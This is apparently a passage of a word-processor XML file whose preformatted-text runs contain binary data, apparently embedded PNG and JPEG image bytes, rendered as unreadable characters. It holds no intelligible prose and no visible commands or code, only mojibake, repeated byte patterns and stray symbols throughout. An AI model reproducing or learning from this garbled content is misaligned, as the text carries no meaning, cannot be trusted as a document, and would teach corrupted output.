        <w:t>??so#VK#44# #?S?#?H?##?#?U4#:+??%N#?I???n9?H???#?9#~?s#p?#$???#?#?????lcV(#7</w:t>
        <w:br/>
        <w:t>????+\?0??XH#?cXJ ???\YkE??p?8??E????a?#???#e?O?Q##U?)?t)????d#5?q?)??*?ASk*??7?[y#??`?|K|TK?@q&amp;???f?#:????I#?h!#?v#??R(</w:t>
        <w:tab/>
        <w:t>-?ZRK(??r??##j(?r??##k-H#???m?4?)??#??8????09*.??##k,#????t?ejz?G#?i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K?$????vp?????#O??#X?#??#u$??#?I?+###???\i??@P?p???#?R9#.???+5}#??)?S?#}UU`??]u??r?\=??\?#E?Wr??^#g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HP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??`/?G/???#?M?k?Z?R;(~:#+##?J?##??YW??K?x?#Kg???%?pR?5??????y|???+S??????q#N</w:t>
        <w:br/>
        <w:t>y#?e??l???b##?????,#\??#&amp;c#??%?W?1P?#?????/C??##??#?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+Ir/_f?Q!|eC"???`?&gt;}?#:#?#c[y &amp;????O?g?#.Y??_???Z`??8u?##??2?##=F??#??k????X##5#???#???9yr????#u???y?##??:2??-##?rAhYEb????#NJ?A(z?e?/##?????`????#u?P?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w?#?#?:??#?ns???_???&amp;#?6j?3?t0?rk#?#81?#cB??V?W#-?G?^?e?#]???#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??X?A??00??:8?@??&lt;?@¤9gL##4q#X?#?W??&amp;?{?#R?T?##}???##</w:t>
        <w:br/>
        <w:t>??}??i+`y?&amp;=??b?k?MP?N&amp;?UjnB???bY?#:???u.u?M??%}#</w:t>
        <w:tab/>
        <w:t>f&lt;???#??_?}?}??#??1O7?YA?#?=????_6Sx##?#u?q???}t???#?.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id.?W3???????#a?1?;?vM??r##I\??`]???u??2?#x#FF?(Ki*??A?:ne)K\/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Ol?w9#?+???S??#Q???:?d???f?j;!YM?V\M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b?#??0l?N??t!#?????#??s0?l]??c???#?B?v</w:t>
        <w:br/>
        <w:t>1P8#?#????^?#?Vy???#rY?/???cB#??e?#??(</w:t>
        <w:tab/>
        <w:t>#?</w:t>
        <w:tab/>
        <w:t>#?d?#ōVn?M??c???%?C?#?k#Ud??&amp;}i??OY?K??E???"??I????FN???X?,??#?#??IOM???%??W?0J###|O&amp;S?7#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>.##?2#???K</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>癩</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?W?o???:#??`eu??k?Ne#??????(?x#y?Ee??# ?????\E6???e??#E?]#??F&amp;???\h???h?7er#???OPe??-R??#7?S?C?K?J?J?=?Rg?z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????ll?Z&amp;W?x?wY#k??.???-?T?&lt;B???#?#?#??Z????6??$?R?J?H1J7???s#u?b?O/-??2?,?#]??b#???B#4*d$:#t6l#?#?K?L??#d{V#[24#T###???#?#????l??\Q#?b=#????N??wr?+l8e??Rj?;ed?#G?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Z????#?#=?#?qT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#6Y?I"?q??#?????h?R?0?\?i%y??-_'?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)?#?9?X???7?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?BVPV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\),#?M&amp;???:?]`#???(?#</w:t>
        <w:tab/>
        <w:t>#t"n?p?k?????##K?E?#7??X??w?#?M#l??#?&amp;.L?S#??#I#XG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{3?nb?*?#??#???^p#?*WM?)??8?m#???Y?[B???][?-?#??#?-u?An??Br?d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>EY?a?2?#^W??|?uO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X0d??a?]???gw%?~))??TA}?</w:t>
        <w:tab/>
        <w:t>??T##</w:t>
        <w:br/>
        <w:t>?V?W??si??&amp;?</w:t>
        <w:tab/>
        <w:t>&lt;u?DA0???5#'0Z?#?{?6hS-?w)?q#?J&amp;b???F??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?цZ?6?a??f$J?W#wa?iD#??#$"?R]#6%F3*j??w???u?&amp;??#|[a?i????.L?-??I#?]??????]#K??t?a#</w:t>
        <w:br/>
        <w:t>Fp?-8????#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l?##nC#?@</w:t>
        <w:br/>
        <w:t>#3p#)??U??????~?4#x?[?????_}??^??%?t##??Sy~b???=?#k??;e?</w:t>
        <w:br/>
        <w:t>s??#???#M??I?|#as?*SU??#jp4?????2?=J???&amp;5 ?#??????oc???7}TV??+6w?D?????7??S???#?</w:t>
        <w:tab/>
        <w:t>??QUF)"?????$RF??2+)?#G?iv#?!iP?#?</w:t>
        <w:br/>
        <w:t>????Qg{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1???#5?z?De??O!#??l??9</w:t>
        <w:tab/>
        <w:t>?P</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>b??##?##??RCZs?##s????#I??fqR?8-y?z+?b#F?J#?J???#?w(?K??T?_??J??????H?B?hW??mXT?U?Y?#?L???GhS?#N????hF&lt;??b?o?-?#????rbg#aC#?###?i?&lt;F??</w:t>
        <w:br/>
        <w:t>?%##?\EE??|#Z=??nuA[T#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?e?69?!??#?3?K#?t=#G#d??G?</w:t>
        <w:tab/>
        <w:t>?/#?#?gZ??PUMNdN?4D?8????#5?"??K:BУi?#????fD%4??BW???#?;e?x?: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DYv??????T??H?6?#7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Ls+X#??#7@g?#H5?U#??-?&gt;"#??D#??? #???#??#??J??_4h????\????##???k##?&amp;!???K???7??#K_#/=#C??:?#?00V?3?W#?|?|R'_??#??5d??L8#p&amp;?!??#(?kS?</w:t>
        <w:br/>
        <w:t>????W#?##?*??&lt; #????dM/#??д????x??e?3?P6Q?H??Q?????p`R?mMO'???]?#Ry?#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#%???_??(?Di(???X9#(es#?g?D&amp;?6?#???wM?7?%??g????Q????#,#`S#?m?/o??#u#????VD+(??y%?&gt;??]?#???##??#?%jW?!m?(;I???o?r???Rh)??*'??#rq#ZCEWr?#;??#G#?r??O=????V"???????UiZ##g[=??#??gU#??#.#K??N?f???%V?qG??##}???9d?2??#?#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:??_?g?8??????{?#&gt; ?'?##??Z&amp;?!?#{Oc8???????#?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:?# ?`???? ?~?t?AdI&gt;o?r?l??#?#?#</w:t>
        <w:tab/>
        <w:t>??!#????UU?X??|?F~??jWZ?#N##p??#33D??}##N#???#s?????q?N5???K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H#&gt;H?@4??#??##W{??i?-</w:t>
        <w:tab/>
        <w:t>"?bn?P??#c???_??###???2W?mE[??l^?</w:t>
        <w:tab/>
        <w:t>??#??XU??\_??##E?_#FD#O?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>-/?p?8????:#|c?g?#?"?##7?#?#??#??57_3/?s??####I??2#oQ?#???#???S}1_P??SF?CYeG?#??A?#:?N??A?????'????q?????'?#?X???p??#?????d?t#??B##K??#?o:##=t##?f?m?@#8h. ?3?#?#????}L??ňfVc?@?\##@?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?u?A?`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?o???5?$L#A?±##.??9###JbN??#q??????#???AY??Z?sc##AU???=#H????k'??B???#???h?{n??:?Q???'r-&gt;Ps??(\?r##?#??o???$?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?8?F##?H??6?zT?@j?¨kj##^?Z???iX2MKyePE?VeHT$0#H#r9##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(?Rg*?qD4#W^?2??(#?S?$?s;?#?J??Q~?.?#?c?E??4#h_??!?n?????</w:t>
        <w:br/>
        <w:t>?##?m/,#????z"?#Q???"?iUb#x??zG!??*#????f????$~?A?6?av?l2??#f M?D#?#w??G????wa?</w:t>
        <w:br/>
        <w:t>#?\??#???,x#P??v??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)?*f?*??q?????F??&gt;^?0#qI#?#?????#V??@#Y??h????NX{?-???1?{??#&amp;</w:t>
        <w:tab/>
        <w:t>]??Weh]?# ?z#w###??D??5????hz??#7?9?;#""#A??#???s????#????#zq??#?p??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>b?*:#?W?##?#p(N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r???????;??#?K_#?#,??#?S2??n???"?#?E??#?K </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??j!?#??#L?'??M,i????????#aX1F?@?????e?F ???E?p?x?8?3%?i??????#?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U?7?V?*W?gS??3iLi???M??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pe???###?c#gsdH????A??J|_?B&lt;/1?yUru #p?2??g{#%??&lt;#o?S[??A#??,?M??$??C??AA??q8?#?#X???#?+???Q?????#3?h?rX?c#?#&gt;?#?(x^??=??y9m??&amp;??6?#Ck6;#X??#?x#$?#q?G??#??-?8????#??#?k?#:p???tI?&amp;$#???#?{?#3??`?Z?dH??#@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=??=???#?#[?A=?#E?#{??le#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7?K@?9?DG??R?#?##a?m??_?N?\?,?X?????Dq???r</w:t>
        <w:br/>
        <w:t>#??????????#?Х"(aN?\|_?T#???dWQ?d????#??1#?)c?6?#qr??5&gt;?O#ll????#?#?#_??????=#y??~9???5n?#k#??~d????Ж?#??g#?#?%??q?o?zvgt?3??kPcP??g???ov??###?????#vLD|X?B@u??7C7?a##?#p?}3??????##&amp;?B?T?e?#?^5??"?#%]?#???#^&gt;??(K##??[A??q???{XQ??#?D???#???8e?RF??1???q'?s?#&gt;?eD??#ī??R#rU?#i???.?#_:?%#??#?#??4#?q&gt;?,%?uR?w?b#??%?;??O{?)?????N??#?+??t??E????#?/X_&gt;??4????#?LP##?IS??{R?#y??3a#??S?n.?Р?f=T6??Aa7? ???;?h?????b?'#oo#e?e?=?#=u??sz</w:t>
        <w:br/>
        <w:t>#tW?;?\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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??R_?? #!??F#?T0??W?#??</w:t>
        <w:br/>
        <w:t>w????}?F#???K2-;]???S+#V?+#&amp;?y??s???#?zV?E?#d%??(?0f/#??Gow)??j\7??TN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#??c#?#S#?Ok2?7?Q#???#H??|#?#-?&lt;?Y?.???~?7gR?3?#)wG???J=?#?R?P?t1O?#P??,???P?^?Qj???Q???m?#???#?.?#?i?#x#?Z??G?#?W?|??#?V?#??????gz??7U##/W?W????##?d#wx##7#?(??U?m?/?y$C??'??G??#z??N?P?Y&lt;#????)r?V'#??B[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6*?9?+?O#?J?9C\?qA?Q?#?r?/???]#??#?O??-UUBr##?+@L?????%!???!v??@#???m?u?&gt;qJm{?b#?^#?#??q#???![B??????:{&lt;#??f^#a??d?I?r?&lt;#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>j#t ??G#r#?#?????&amp;?#?+?C?E#RA##I?o??y#?#?Pi#??y??{^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?m1?q?v#?_?3Y'??%}d9?8?#{????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##?'#O??}=ju?S?z\r???'?}Eщ?F*?:?sax?#??`?G???Q??2?2#D3*?e?c|???##M???e??1^?????0#?{?'</w:t>
        <w:tab/>
        <w:t>??F???_#e?e#?+?</w:t>
        <w:tab/>
        <w:t>????`}#?7???#g|??0???Г?KsF-?#ldrl??</w:t>
        <w:tab/>
        <w:t>4se=?I)#?}=#?#1]#:?#?,g#O??k9T??k??b??#)?V?#|????*#o(?.8,;Q?@???#R?@</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??##?###qE???.0?#?r?_?H?~?K?#3mT?#(??E???@?#??`pt?v!t?i??#???v?&amp;Ub?#?j?#?????w7t??z?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ブ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>{??u&lt;??q)#?Q|#y!?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>x???t?#4???\US8k???%c??#x?5#L?F?(</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>剌</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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bI???pm?##?@?? ?###?b??%l????!et?W?#?B#?7?#]????#??2#&amp;??|?????????&lt;?\'?#w?n?#[ZY#?##?tln?:?}?2?/?)Q???~SKR?s?c??#g?OC.??u?lE</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>L#2D4????8?</w:t>
        <w:tab/>
        <w:t>`?</w:t>
        <w:br/>
        <w:t>?$~Wd-??#u??3\&lt;???-????@???2m??#??s;p?J#??#2K????o#.??Fп8~?/??*F1?)QiW.+MaT?5??#?????+[??mC?L?#8BR##'#????(??:#?#??#??&lt;?#?\'??Yb????^?~#?'?#??V?1?o??+\=??B??/??km?F</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>磻</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>????_??M?),##?v#?v??#???i?1v??q"???J?K?2L?4?&amp;AOS'?#&amp;??#?????AV?@B?_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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>"0;M&gt;??&amp;^#8#?&gt;Cl#??#?#??~?N(#i??</w:t>
        <w:br/>
        <w:t>?#</w:t>
        <w:br/>
        <w:t>0#_7]b???&lt;??6B#?6?t&lt;????b?\?Jn`#??M$??4#9&lt;?joG##???),</w:t>
        <w:tab/>
        <w:t>??#Zk#N1?#?8????? #K&gt;?_?g}#P?##?:??im????D?????EI????з2#t#,??f#B#To?\LP????f??2#?#Q??R?x?p#??T?!?#??{*^???????x??$w&amp;??????u#?s?~?(6k#??#?|??_H##?.##=??N??1s</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>犻</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gS"'??/C#x???S#?s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>c3??#?#??#?l?s?s??q?&lt;BfU</w:t>
        <w:br/>
        <w:t>r?????Z</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>戧</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>/???#X??$'l??+_?(#e?Csn?</w:t>
        <w:tab/>
        <w:t>TZ)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B?L?#\:h?!??S?c?2?*?QeP^#/???{???8??.??^??#?,?"M??#8?H???w?u?w???}???j?#?u???7#?##c-??!.?l???????x*#A=??:??#z$#@?"i?t)6?#??U??????##b$U?A</w:t>
        <w:tab/>
        <w:t>#?3???@X!?-?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>*/???#?B???#</w:t>
        <w:tab/>
        <w:t>????Wz?&amp;???i?{??eD=#&gt;??0??t?/J??v#:fwW???#P???B?\Z?{?}????w&lt;?W?i????#?</w:t>
        <w:tab/>
        <w:t>#?#??\?/??oM??.####IEND?B`??F#??2##?:w??M-o???L#)?k?????##JFIF#####`#`##??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?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??######J##"#######??############################</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#??#?################}########!1A##Qa#"q#2???##B??#R??$3br?</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#####%&amp;'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz???????????????????????????????????????????????????????????????????????????############################</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#??#?################w#######!1##AQ#aq#"2?##B????</w:t>
        <w:tab/>
        <w:t>#3R?#br?</w:t>
        <w:br/>
        <w:t>#$4?%?####&amp;'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?????????????????????????????????????????????????????????????????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???#??J?/?##?#?q#???O?n????##?{h?u@?k#???</w:t>
        <w:tab/>
        <w:t>'#?=k??#?J???#?#?????;?Mc?????7???^?@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?e#??S?#?c???#~4/?VW??@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??B?#?ey7??~?#?#|#????S?+#??*y?In??@Q?bp##&lt;</w:t>
        <w:br/>
        <w:t>?b?#????|4?#?gL?#?X?#???;?Mc?????7???^?^U?'?|#?#?3F?#?#k?h#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#???#g?? _</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??Y???:???#????|4?#?gL?#?X?#???;?Mc?????7???^?^U?'?|#?#?3F?#?#k?h#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#??(#???#g?? _</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??Y???:???#????|4?#?gL?#?X?#???;?Mc?????7???^?^U?'?|#?#?3F?#?#k?h#??(#??(#??(#??(#??(#??(#??(#??(#??al#p&gt;?#?*????O??"S??</w:t>
        <w:br/>
        <w:t>???=G?w#??#△??"???'?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?V#???I??#?Ee??,?????)Q???????#?h#j???#???r#??F?1?#?#??</w:t>
        <w:br/>
        <w:t>#?h?#?mn??L?0.7Kp?Pd?#?+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?#??</w:t>
        <w:tab/>
        <w:t>?#?Z#(??#(??#(??#(??#+????H#?O?#t??%??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>詛</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?#g?? _</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??Y???:#?O?N?#?X?7?#bf??#?0??~???k##?#?L??#?Z#(??#(??#(??#(??#(??#(??#(??#(??#?y]???\?????????G5?#??A????WX?0 ?????q'?c?s??##??h@p? ???u{=2k{????e?#J????f#??)</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?e?#?H??#?&lt;Mq#??_R?"??+b;#,\??T?H?nm??$?Kc?@??Cvg?:?Ri#s?K?#???#?Lo???4?e???'?</w:t>
        <w:br/>
        <w:t>?&lt;a???KY^?G X???G??[???#?????ZC???E3~??2#T?Aa?7g???????|J??#mt??@L?????A?!?sLQ?#??#g#??? ???&gt;ZM0#g?v]?~bP!?2&gt;?^i?#??/#/%.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ZE(?#????O????#s??O????#?x???A?#??????mkVxn????"dm??#?F1???q#?#w??????#?x##??7Q?A???</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>洧</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>9M&amp;?o#?#Ri??#?m?U%]#a???##?&gt;???(?K?W#??f??#?</w:t>
        <w:tab/>
        <w:t>??SQs,?##U{O0??.?(O?##</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>諝</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>o#??v?q????GL+b??#hn&lt;s}??[i?G?yA#?#?v=#}#???&lt;u??##-H##Q@##Q@##Q@##Q@#|/?=?#?i?#bΙ?#????#????#$#???:g???@#I????k##?#?L??#?Z??;?Mc?????7???^?@##Q@##Q@##Q@##Q@##Q@##Q@##Q@##Q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?-jv??n? &lt;,?X&gt;?1^?&lt;?(d??PX?#?zt?i??????SM#??6??,?V??#?#:??M??|I?+?PB?=?m???.?n??p?G??aKK??]m?(?!?##???+?</w:t>
        <w:br/>
        <w:t>??#h?5?a)iqx?#??#?#?#$py?#???'????p6?#?#|?Lу???9?#??A?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>m?#N#?f???*?_??##?#?$?5??GC#D??O?H|?## ??#?##z#?ex{??ˋ????&lt;??</w:t>
        <w:tab/>
        <w:t>????!&gt;L+##51#?3#wp??2p)????|??n??7Y?#??&lt;????#????-|??#?</w:t>
        <w:tab/>
        <w:t>@zd#??P??[?ST????#??A#Gycj#??m?#?#?&amp;K#6?m9?KA??4?l??#?[?#B?#[b###y8??h?#???#?Z????????]o??9t-9???q)?:#oj?&gt;?&gt;7#d???U?r&gt;?$?#J0wG#????t?&lt;G?'?t#???-?;?82C#???X?#?b?/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W?@Mz???jb?#???##7?H#?R##?##su??#ii#JZB</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>?_?z?#?#????3?#Ic??+????H#?O?#t??%??&gt;??????&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#?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?_?w??????#4o?!??V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1|axl&lt;7?L##?????k?4??#W??Mw_#???)"g#iR????#H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I#?j?#_#_=???I???&lt;??/#6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g??q??^y?##?##]O?????i#a?#??6?q?FMv?%??#O??IM&amp;#?0??q$e??`#?}?A#??x#V_#R?V??m#???Y??-!Y#?q?.&lt;#?Z?{??????[??????R?-??#2???9#q?#???????n.?"?DF???Ac?2{?*?????]??d??0[?#??wx?r@FR?##???q?j?#????-??B??k?$?##{t#?Q?#?+?OP??D??m-?#??#?#??&lt;a?#A?ErZ?ψ.u???SS#y;"K??#i%?#=G'#?A#`?T&gt;'??W3???d,#???_%?#??#?R?v?#*=7?w?,??m! iI?y^5?B???#c??NG4k?#?A?i??_?-??#??Frq??&lt;??#!!Q??#*{mA5_#?????p?!?]?h#8?#zv??#?7N??4#?m0H}r??&gt;????~#?##?&gt;#??VkU??\??#??o?w#au#?#0#???_W?zp?K##????#?U#?Rc/?E#?(??#(??#(??#(??#+????H#?O?#t??%??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>詛</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?#g?? _</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??Y???:#?O?N?#?X?7?#bf??#?0??~???k##?#?L??#?Z#(??#(??#(??#(??#(??#(??#(??#(???8#??;????#?????G?#eX??\\L#?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??qR|C?7&gt;9?????#lr2??#?"?e}#???j????8??#w??????#???#?*?~#?0??O???#?+??.&lt;G?I|?,#7?????F#?q?????J??Yn.#G???&lt;???kp???#?l9l##?Q?3d#??X??Z#5???#??O?#A?#6:??{?##w'??=3?#j??6?????x?#??#F#`#`=*{??;?#???7???g??P?I?##?Z:#Z?E?????J????##QA?????Q???????????????Iq#??#?.#??C#?TG?s???x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lt;;#??G,??v?,0??Y??FF?#8;p8'?`#??w#?]Z???v?#r?????#??5k????##?#???m?Y?##?T??&lt;???w?#?i#?J?&amp;pZ?????t?8?3?[@}0###?5??|??[??##??3]#?F??H???##QE##QE##QE##QE##QE##????#$#???:g???_tW??#????/???,??K##}'?'?|#?#?3F?#?#k?k?d??5???&amp;h??C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
